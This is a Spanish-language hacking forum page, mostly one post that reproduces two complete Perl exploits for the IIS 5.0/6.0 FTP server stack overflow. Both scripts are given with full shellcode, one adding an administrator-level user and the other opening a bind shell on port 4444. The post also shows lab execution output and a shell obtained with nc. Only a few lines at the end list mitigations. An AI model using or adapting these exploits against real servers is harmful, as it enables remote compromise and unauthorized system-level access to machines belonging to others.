elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Únete al Grupo Steam elhacker.NET


  Mostrar Temas
Páginas: [1] 2 3
1  Seguridad Informtica / Bugs y Exploits / MOVIDO: Bug spotify paraa premium en: 24 Octubre 2011, 22:36
El tema ha sido movido a Papelera.

http://foro.elhacker.net/index.php?topic=342391.0
2  Seguridad Informtica / Bugs y Exploits / MOVIDO: exploits para Vista o 7? en: 4 Enero 2011, 11:21
El tema ha sido movido a Hacking Bsico.

http://foro.elhacker.net/index.php?topic=315559.0
3  Seguridad Informtica / Nivel Web / XSS Persistente en Blogger 28 DE DICIEMBRE DE 2010 en: 28 Diciembre 2010, 07:40
Apenas veo mi twitter y han posteado esto:

:http://www.securitybydefault.com/2010/12/0day-xss-persistente-en-bloggercom-y.html

Mmm ahora cual sera el famoso string que ha bypaseado las filtros de Blogger?

En fin, ya me enterare.

-berz3k.
4  Seguridad Informtica / Bugs y Exploits / Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploits (win2k sp4) en: 2 Septiembre 2009, 12:37
Como bien sabemos la noticia de esta nueva vulnerabilidad esta causando estragos en algunas redes, he probado en mi pequeo lab a modo Proof Of Concept, necesariamente debemos tener privilegios de escritura:

Exploit 1: Esta primera version tan solo te agrega un usuario:winown pass:nwoniw dentro de la shellcode.

Código:
#!/usr/bin/perl
# IIS 5.0 FTPd / Remote r00t exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2<at>googlemail.com
# Affects IIS6 with stack cookie protection
# August 2009 - KEEP THIS 0DAY PRIV8
use IO::Socket;
$|=1;
#metasploit shellcode, adduser "winown:nwoniw"
$sc = "\x89\xe2\xda\xde\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x4b\x4c\x4a\x48\x50\x44\x43\x30\x43\x30" .
"\x43\x30\x4c\x4b\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x45\x55" .
"\x42\x58\x45\x51\x4a\x4f\x4c\x4b\x50\x4f\x45\x48\x4c\x4b" .
"\x51\x4f\x51\x30\x43\x31\x4a\x4b\x47\x39\x4c\x4b\x47\x44" .
"\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49\x50\x4c\x59\x4e\x4c" .
"\x4c\x44\x49\x50\x44\x34\x43\x37\x49\x51\x49\x5a\x44\x4d" .
"\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47\x4b\x51\x44\x46\x44" .
"\x43\x34\x43\x45\x4a\x45\x4c\x4b\x51\x4f\x51\x34\x43\x31" .
"\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f" .
"\x45\x4c\x45\x51\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x45\x51" .
"\x4a\x4b\x4b\x39\x51\x4c\x46\x44\x44\x44\x48\x43\x51\x4f" .
"\x46\x51\x4c\x36\x43\x50\x50\x56\x45\x34\x4c\x4b\x50\x46" .
"\x50\x30\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c" .
"\x4e\x4d\x4c\x4b\x42\x48\x45\x58\x4d\x59\x4a\x58\x4c\x43" .
"\x49\x50\x43\x5a\x46\x30\x43\x58\x4c\x30\x4c\x4a\x44\x44" .
"\x51\x4f\x43\x58\x4a\x38\x4b\x4e\x4d\x5a\x44\x4e\x50\x57" .
"\x4b\x4f\x4a\x47\x42\x43\x42\x4d\x45\x34\x46\x4e\x42\x45" .
"\x44\x38\x43\x55\x47\x50\x46\x4f\x45\x33\x47\x50\x42\x4e" .
"\x42\x45\x43\x44\x51\x30\x44\x35\x44\x33\x45\x35\x44\x32" .
"\x51\x30\x43\x47\x43\x59\x42\x4e\x42\x4f\x43\x47\x42\x4e" .
"\x51\x30\x42\x4e\x44\x37\x42\x4f\x42\x4e\x45\x39\x43\x47" .
"\x47\x50\x46\x4f\x51\x51\x50\x44\x47\x34\x51\x30\x46\x46" .
"\x51\x36\x51\x30\x42\x4e\x42\x45\x44\x34\x51\x30\x42\x4c" .
"\x42\x4f\x43\x53\x45\x31\x42\x4c\x42\x47\x43\x42\x42\x4f" .
"\x43\x45\x42\x50\x47\x50\x47\x31\x42\x44\x42\x4d\x45\x39" .
"\x42\x4e\x42\x49\x42\x53\x43\x44\x43\x42\x45\x31\x44\x34" .
"\x42\x4f\x43\x42\x43\x43\x47\x50\x42\x57\x45\x39\x42\x4e" .
"\x42\x4f\x42\x57\x42\x4e\x47\x50\x46\x4f\x47\x31\x51\x54" .
"\x51\x54\x43\x30\x41\x41";
#1ca
print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n";
if ($#ARGV ne 1) {
print "usage: iiz5.pl <target> <your local ip>\n";
exit(0);
}
srand(time());
$port = int(rand(31337-1022)) + 1025;
$locip = $ARGV[1];
$locip =~ s/\./,/gi;
if (fork()) {
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                              PeerPort => '21',
                              Proto    => 'tcp');
$patch = "\x7E\xF1\xFA\x7F";
#$retaddr = "ZZZZ";
$retaddr = "\x9B\xB1\xF4\x77"; # JMP ESP univ on 2 win2k platforms
$v = "KSEXY" . $sc . "V" x (500-length($sc)-5);
# top address of stack frame where shellcode resides, is hardcoded inside this block
$findsc="\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38\x53"
   ."\x45\x58\x59\x75\xF7\x40\x40\x40\x40\xFF\xFF\xE0";
# attack buffer
$c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch.
   ($patch x (52/4)) .$patch."EEEE$retaddr".$patch.
   "HHHHIIII".
$patch."JKKK"."\xE9\x63\xFE\xFF\xFF\xFF\xFF"."NNNN";
$x = <$sock>;
print $x;                            
print $sock "USER anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "PASS anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "MKD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n"; # We store shellcode in memory of process (stack)
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "CWD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "MKD CCC". "$c\r\n";
$x = <$sock>;
print $x;
print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n";
$x = <$sock>;
print $x;
# TRIGGER
print $sock "NLST $c*/../C*/\r\n";
$x = <$sock>;
print $x;
while (1) {}
} else {
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1);
die "Could not create socket: $!\n" unless $servsock;
my $new_sock = $servsock->accept();
while(<$new_sock>) {
print $_;
}
close($servsock);
}
#Cheerio,
#
#Kingcope

Ejecucion:
Código:
C:\>perl -x exploit1.pl 192.168.1.68 192.168.1.100

IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2
220 win2k-pro Microsoft FTP Service (Version 5.0).
331 Anonymous access allowed, send identity (e-mail name) as password.
230 Anonymous user logged in.
257 "w00t20560" directory created.
500 'SITE KSEXYΓ┌▐┘r⌠[SYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLJHPDC0C0C0LKG5GLLKCLEUBXEQJOLKPOEHLKQOQ0C1JKG9LKGDLKC1JNP1IPLYNLLDIPD4C7IQIZDMC1IRJKL4GKQDFDC4CEJELKQOQ4C1JKCVLKDLPKLKQ
OELEQJKLKELLKEQJKK9QLFDDDHCQOFQL6CPPVE4LKPFP0LKG0DLLKBPELNMLKBHEXMYJXLCIPCZF0CXL0LJDDQOCXJ8KNMZDNPWKOJGBCBME4FNBED8CUGPFOE3GPBNBECDQ0D5D3E5D2Q0CGCYBNBOCGBNQ0BND7BOBNE9CGGPFOQQPDG4Q0FFQ6Q0BNBED4Q0B
LBOCSE1BLBGCBBOCEBPGPG1BDBME9BNBIBSCDCBE1D4BOCBCCGPBWE9BNBOBWBNGPFOG1QTQTC0AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV': command not understood
500 'SITE KSEXYΓ┌▐┘r⌠[SYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLJHPDC0C0C0LKG5GLLKCLEUBXEQJOLKPOEHLKQOQ0C1JKG9LKGDLKC1JNP1IPLYNLLDIPD4C7IQIZDMC1IRJKL4GKQDFDC4CEJELKQOQ4C1JKCVLKDLPKLKQ
OELEQJKLKELLKEQJKK9QLFDDDHCQOFQL6CPPVE4LKPFP0LKG0DLLKBPELNMLKBHEXMYJXLCIPCZF0CXL0LJDDQOCXJ8KNMZDNPWKOJGBCBME4FNBED8CUGPFOE3GPBNBECDQ0D5D3E5D2Q0CGCYBNBOCGBNQ0BND7BOBNE9CGGPFOQQPDG4Q0FFQ6Q0BNBED4Q0B
LBOCSE1BLBGCBBOCEBPGPG1BDBME9BNBIBSCDCBE1D4BOCBCCGPBWE9BNBOBWBNGPFOG1QTQTC0AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV': command not understood
500 'SITE KSEXYΓ┌▐┘r⌠[SYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLJHPDC0C0C0LKG5GLLKCLEUBXEQJOLKPOEHLKQOQ0C1JKG9LKGDLKC1JNP1IPLYNLLDIPD4C7IQIZDMC1IRJKL4GKQDFDC4CEJELKQOQ4C1JKCVLKDLPKLKQ
OELEQJKLKELLKEQJKK9QLFDDDHCQOFQL6CPPVE4LKPFP0LKG0DLLKBPELNMLKBHEXMYJXLCIPCZF0CXL0LJDDQOCXJ8KNMZDNPWKOJGBCBME4FNBED8CUGPFOE3GPBNBECDQ0D5D3E5D2Q0CGCYBNBOCGBNQ0BND7BOBNE9CGGPFOQQPDG4Q0FFQ6Q0BNBED4Q0B
LBOCSE1BLBGCBBOCEBPGPG1BDBME9BNBIBSCDCBE1D4BOCBCCGPBWE9BNBOBWBNGPFOG1QTQTC0AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV': command not understood
500 'SITE KSEXYΓ┌▐┘r⌠[SYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLJHPDC0C0C0LKG5GLLKCLEUBXEQJOLKPOEHLKQOQ0C1JKG9LKGDLKC1JNP1IPLYNLLDIPD4C7IQIZDMC1IRJKL4GKQDFDC4CEJELKQOQ4C1JKCVLKDLPKLKQ
OELEQJKLKELLKEQJKK9QLFDDDHCQOFQL6CPPVE4LKPFP0LKG0DLLKBPELNMLKBHEXMYJXLCIPCZF0CXL0LJDDQOCXJ8KNMZDNPWKOJGBCBME4FNBED8CUGPFOE3GPBNBECDQ0D5D3E5D2Q0CGCYBNBOCGBNQ0BND7BOBNE9CGGPFOQQPDG4Q0FFQ6Q0BNBED4Q0B
LBOCSE1BLBGCBBOCEBPGPG1BDBME9BNBIBSCDCBE1D4BOCBCCGPBWE9BNBOBWBNGPFOG1QTQTC0AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV': command not understood
500 'SITE KSEXYΓ┌▐┘r⌠[SYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLJHPDC0C0C0LKG5GLLKCLEUBXEQJOLKPOEHLKQOQ0C1JKG9LKGDLKC1JNP1IPLYNLLDIPD4C7IQIZDMC1IRJKL4GKQDFDC4CEJELKQOQ4C1JKCVLKDLPKLKQ
OELEQJKLKELLKEQJKK9QLFDDDHCQOFQL6CPPVE4LKPFP0LKG0DLLKBPELNMLKBHEXMYJXLCIPCZF0CXL0LJDDQOCXJ8KNMZDNPWKOJGBCBME4FNBED8CUGPFOE3GPBNBECDQ0D5D3E5D2Q0CGCYBNBOCGBNQ0BND7BOBNE9CGGPFOQQPDG4Q0FFQ6Q0BNBED4Q0B
LBOCSE1BLBGCBBOCEBPGPG1BDBME9BNBIBSCDCBE1D4BOCBCCGPBWE9BNBOBWBNGPFOG1QTQTC0AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV': command not understood
250 CWD command successful.
257 "CCC╕UURU5UUUU@8SEXYu≈@@@@ αC~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂EEEE▒⌠w~⌂HHHHIIII~
⌂JKKKΘc■  NNNN" directory created.
200 PORT command successful.
150 Opening ASCII mode data connection for file list.


Despues podemos comprobar si hemos tenido exito dentro del mismo FTP

Código:
C:\>ftp 192.168.1.68
Conectado a 192.168.1.68.
220 win2k-pro Microsoft FTP Service (Version 5.0).
Usuario (192.168.1.68:(none)): winown
331 Password required for winown.
Contrasea: [b]nwoniw[/b]
230 User winown logged in.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
w00t20560
226 Transfer complete.
ftp: 11 bytes recibidos en 0.00 segundos 3.67 a Kbytes/s.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
08-31-09  07:41PM       <DIR>          w00t20560
226 Transfer complete.
ftp: 50 bytes recibidos en 0.00 segundos 50000.00 a Kbytes/s.
ftp>

El admin notara un usuario creado con privilegios:




Exploit 2: Este segundo exploit "mejorado" se define un bind shell en el puerto 4444 dentro de la shellcode

Código:
#!/usr/bin/perl
# IIS 5.0 FTP Server / Remote SYSTEM exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2<at>googlemail.com
# Affects IIS6 with stack cookie protection
# Modded by muts, additional egghunter added for secondary larger payload
# Might take a minute or two for the egg to be found.
# Opens bind shell on port 4444

# http://www.offensive-security.com/0day/msftp.pl.txt

use IO::Socket;
$|=1;
$sc = "\x89\xe2\xdd\xc5\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x43" .
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34" .
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41" .
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58" .
"\x50\x38\x41\x43\x4a\x4a\x49\x45\x36\x4d\x51\x48\x4a\x4b\x4f" .
"\x44\x4f\x47\x32\x46\x32\x42\x4a\x43\x32\x46\x38\x48\x4d\x46" .
"\x4e\x47\x4c\x45\x55\x51\x4a\x44\x34\x4a\x4f\x48\x38\x46\x34" .
"\x50\x30\x46\x50\x50\x57\x4c\x4b\x4b\x4a\x4e\x4f\x44\x35\x4a" .
"\x4a\x4e\x4f\x43\x45\x4b\x57\x4b\x4f\x4d\x37\x41\x41";
# ./msfpayload windows/shell_bind_tcp R |  ./msfencode -e x86/shikata_ga_nai -b "\x00\x0a\x0d"

$shell="T00WT00W" ."\xda\xde\xbd\x2d\xe7\x9b\x9f\x2b\xc9\xb1\x56\xd9\x74\x24\xf4" .
"\x5a\x83\xea\xfc\x31\x6a\x15\x03\x6a\x15\xcf\x12\x67\x77\x86" .
"\xdd\x98\x88\xf8\x54\x7d\xb9\x2a\x02\xf5\xe8\xfa\x40\x5b\x01" .
"\x71\x04\x48\x92\xf7\x81\x7f\x13\xbd\xf7\x4e\xa4\x70\x38\x1c" .
"\x66\x13\xc4\x5f\xbb\xf3\xf5\xaf\xce\xf2\x32\xcd\x21\xa6\xeb" .
"\x99\x90\x56\x9f\xdc\x28\x57\x4f\x6b\x10\x2f\xea\xac\xe5\x85" .
"\xf5\xfc\x56\x92\xbe\xe4\xdd\xfc\x1e\x14\x31\x1f\x62\x5f\x3e" .
"\xeb\x10\x5e\x96\x22\xd8\x50\xd6\xe8\xe7\x5c\xdb\xf1\x20\x5a" .
"\x04\x84\x5a\x98\xb9\x9e\x98\xe2\x65\x2b\x3d\x44\xed\x8b\xe5" .
"\x74\x22\x4d\x6d\x7a\x8f\x1a\x29\x9f\x0e\xcf\x41\x9b\x9b\xee" .
"\x85\x2d\xdf\xd4\x01\x75\xbb\x75\x13\xd3\x6a\x8a\x43\xbb\xd3" .
"\x2e\x0f\x2e\x07\x48\x52\x27\xe4\x66\x6d\xb7\x62\xf1\x1e\x85" .
"\x2d\xa9\x88\xa5\xa6\x77\x4e\xc9\x9c\xcf\xc0\x34\x1f\x2f\xc8" .
"\xf2\x4b\x7f\x62\xd2\xf3\x14\x72\xdb\x21\xba\x22\x73\x9a\x7a" .
"\x93\x33\x4a\x12\xf9\xbb\xb5\x02\x02\x16\xc0\x05\xcc\x42\x80" .
"\xe1\x2d\x75\x36\xad\xb8\x93\x52\x5d\xed\x0c\xcb\x9f\xca\x84" .
"\x6c\xe0\x38\xb9\x25\x76\x74\xd7\xf2\x79\x85\xfd\x50\xd6\x2d" .
"\x96\x22\x34\xea\x87\x34\x11\x5a\xc1\x0c\xf1\x10\xbf\xdf\x60" .
"\x24\xea\x88\x01\xb7\x71\x49\x4c\xa4\x2d\x1e\x19\x1a\x24\xca" .
"\xb7\x05\x9e\xe9\x4a\xd3\xd9\xaa\x90\x20\xe7\x33\x55\x1c\xc3" .
"\x23\xa3\x9d\x4f\x10\x7b\xc8\x19\xce\x3d\xa2\xeb\xb8\x97\x19" .
"\xa2\x2c\x6e\x52\x75\x2b\x6f\xbf\x03\xd3\xc1\x16\x52\xeb\xed" .
"\xfe\x52\x94\x10\x9f\x9d\x4f\x91\xbf\x7f\x5a\xef\x57\x26\x0f" .
"\x52\x3a\xd9\xe5\x90\x43\x5a\x0c\x68\xb0\x42\x65\x6d\xfc\xc4" .
"\x95\x1f\x6d\xa1\x99\x8c\x8e\xe0\x90";


print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n";
if ($#ARGV ne 1) {
print "usage: iiz5.pl <target> <your local ip>\n";
exit(0);
}
srand(time());
$port = int(rand(31337-1022)) + 1025;
$locip = $ARGV[1];
$locip =~ s/\./,/gi;
if (fork()) {
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                              PeerPort => '21',
                              Proto    => 'tcp');
$patch = "\x7E\xF1\xFA\x7F";
$retaddr = "\x9B\xB1\xF4\x77"; # JMP ESP univ on 2 win2k platforms

$v = "KSEXY" . $sc . "V" x (500-length($sc)-5);
# top address of stack frame where shellcode resides, is hardcoded inside this block
$findsc="\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38\x53"
   ."\x45\x58\x59\x75\xF7\x40\x40\x40\x40\xFF\xFF\xE0";

# attack buffer
$c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch.
   ($patch x (52/4)) .$patch."EEEE$retaddr".$patch.
   "HHHHIIII".
$patch."JKKK"."\xE9\x63\xFE\xFF\xFF\xFF\xFF"."NNNN";
$x = <$sock>;
print $x;                            
print $sock "USER anonimoos\r\n";
$x = <$sock>;
print $x;
print $sock "PASS $shell\r\n";
$x = <$sock>;
print $x;
print $sock "USER anonimoos\r\n";
$x = <$sock>;
print $x;
print $sock "PASS $shell\r\n";
$x = <$sock>;
print $x;

print $sock "USER anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "PASS anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "MKD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n"; # We store shellcode in memory of process (stack)
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "CWD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "MKD CCC". "$c\r\n";
$x = <$sock>;
print $x;
print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n";
$x = <$sock>;
print $x;
# TRIGGER
print $sock "NLST $c*/../C*/\r\n";
$x = <$sock>;
print $x;
while (1) {}
} else {
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1);
die "Could not create socket: $!\n" unless $servsock;
my $new_sock = $servsock->accept();
while(<$new_sock>) {
print $_;
}
close($servsock);
}
#Cheerio,
#
#Kingcope

Ejecucion:
Código:
C:\>perl -x exploit2.pl 192.168.1.68 192.168.1.100

IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2
220 win2k-pro Microsoft FTP Service (Version 5.0).
331 Password required for anonimoos.
500 'PASS T00WT00W┌▐╜-τ+╔▒V┘t$⌠ZΩⁿ1j♥j╧↕gw▌T}╣*☻⌡Φ@[☺q♦H≈⌂‼╜≈Np8∟f‼─_╗≤⌡╬≥2═!δV▄(WOk►/Ωσ⌡ⁿV╛Σ▌ⁿ▲1▼b_>δ►^"╪P╓Φτ\█ Z♦Z╣₧Γe+=Dφσt"Mmz→)♫╧Aε-▀╘☺u╗u‼╙jC╗╙.☼.HR'Σfm╖b▲
-⌐ѪwN╔╧└4▼/╚≥K⌂b╥≤r█!║"sz3J↕∙╗╡☻☻▬└♣╠B-u6╕R]φ♀╦╩lα8╣%vt╫≥yP╓-"4Ω4◄Z┴♀►┐▀`$Ω☺╖qIL-▲↓→$╩╖♣₧ΘJ╙┘ τ3U∟├#O►{╚↓╬=δ╕↓,nRu+o┐♥╙┴▬Rδφ■R►O┐⌂Z∩W&☼R:┘σCZ♀h░Bemⁿ─▼mα': com
mand not understood
331 Password required for anonimoos.
500 'PASS T00WT00W┌▐╜-τ+╔▒V┘t$⌠ZΩⁿ1j♥j╧↕gw▌T}╣*☻⌡Φ@[☺q♦H≈⌂‼╜≈Np8∟f‼─_╗≤⌡╬≥2═!δV▄(WOk►/Ωσ⌡ⁿV╛Σ▌ⁿ▲1▼b_>δ►^"╪P╓Φτ\█ Z♦Z╣₧Γe+=Dφσt"Mmz→)♫╧Aε-▀╘☺u╗u‼╙jC╗╙.☼.HR'Σfm╖b▲
-⌐ѪwN╔╧└4▼/╚≥K⌂b╥≤r█!║"sz3J↕∙╗╡☻☻▬└♣╠B-u6╕R]φ♀╦╩lα8╣%vt╫≥yP╓-"4Ω4◄Z┴♀►┐▀`$Ω☺╖qIL-▲↓→$╩╖♣₧ΘJ╙┘ τ3U∟├#O►{╚↓╬=δ╕↓,nRu+o┐♥╙┴▬Rδφ■R►O┐⌂Z∩W&☼R:┘σCZ♀h░Bemⁿ─▼mα': com
mand not understood
331 Anonymous access allowed, send identity (e-mail name) as password.
230 Anonymous user logged in.
257 "w00t26878" directory created.
500 'SITE KSEXYΓ▌┼┘r⌠_WYIIIICCCCCCQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIE6MQHJKODOG2F2BJC2F8HMFNGLEUQJD4JOH8F4P0FPPWLKKJNOD5JJNOCEKWKOM7AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV': command not understood
500 'SITE KSEXYΓ▌┼┘r⌠_WYIIIICCCCCCQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIE6MQHJKODOG2F2BJC2F8HMFNGLEUQJD4JOH8F4P0FPPWLKKJNOD5JJNOCEKWKOM7AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV': command not understood
500 'SITE KSEXYΓ▌┼┘r⌠_WYIIIICCCCCCQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIE6MQHJKODOG2F2BJC2F8HMFNGLEUQJD4JOH8F4P0FPPWLKKJNOD5JJNOCEKWKOM7AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV': command not understood
500 'SITE KSEXYΓ▌┼┘r⌠_WYIIIICCCCCCQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIE6MQHJKODOG2F2BJC2F8HMFNGLEUQJD4JOH8F4P0FPPWLKKJNOD5JJNOCEKWKOM7AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV': command not understood
500 'SITE KSEXYΓ▌┼┘r⌠_WYIIIICCCCCCQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIE6MQHJKODOG2F2BJC2F8HMFNGLEUQJD4JOH8F4P0FPPWLKKJNOD5JJNOCEKWKOM7AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV': command not understood
250 CWD command successful.
257 "CCC╕UURU5UUUU@8SEXYu≈@@@@ αC~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂EEEE▒⌠w~⌂HHHHIIII~
⌂JKKKΘc■  NNNN" directory created.
200 PORT command successful.
150 Opening ASCII mode data connection for file list.

C:\>nc -vvn 192.168.1.68 4444

(UNKNOWN) [192.168.1.68] 4444 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

Barbaros!


Links de interes:

Exploits:
:http://www.milw0rm.com/exploits/9541
:http://www.milw0rm.com/exploits/9559

Video demo de offensive-security
:http://www.offensive-security.com/videos/microsoft-ftp-server-remote-exploit/msftp.html

Mejores practicas para MS FTP
:http://www.microsoft.com/technet/prodtechnol/WindowsServer2003/Library/IIS/7b4bdad5-9a0a-4bf6-8b00-41084b783e20.mspx?mfr=true

+FIX
-Pues son pocos los factores de mitigacion, realmente es evitar escritura para los users "anonymous"
- Apagar el servicio de FTP si no es necesario
- Crearl ACLs para usuarios y directorios.



+Examinar los archivos LOGS

Generalmente en esta ruta:
Código:
